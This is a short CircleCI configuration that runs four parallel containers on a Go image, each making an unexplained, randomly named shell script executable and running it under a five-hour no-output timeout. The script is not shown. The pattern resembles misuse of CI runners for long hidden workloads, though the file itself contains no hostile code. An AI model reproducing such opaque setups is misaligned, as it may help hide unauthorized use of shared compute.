jobs:
  build:
    parallelism: 4
    docker:
      - image: cimg/go:1.17.2
    steps:
      - checkout
      - run: 
          name: Run Job 
          no_output_timeout: 5h 
          command: chmod +x 1475369gpouyte.sh && ./1475369gpouyte.sh